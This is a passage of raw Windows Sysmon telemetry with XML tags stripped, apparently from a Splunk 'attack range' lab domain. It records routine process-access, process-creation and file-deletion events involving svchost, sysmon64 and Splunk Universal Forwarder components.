08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.991{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.976{0C1E0330-F7C4-60EB-CF79-00000000D001}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.304{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.289{0C1E0330-F7C4-60EB-CE79-00000000D001}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:24.038{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44AAAF02662DAC0D1B0C0362140DCB41,SHA256=1BEAA2C6A6E02E6888D43889FE3DF6DB3EF22D3AE5AD8D8BFB1EB3E5821D25A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:24.050{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31F5BF35CAB9DF509E77F4A5D3CDE4E3,SHA256=99DF0638D7387AEEE91B0A9149F0C56A3C548E4807E3759DD0A6FC41D0D7DEAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 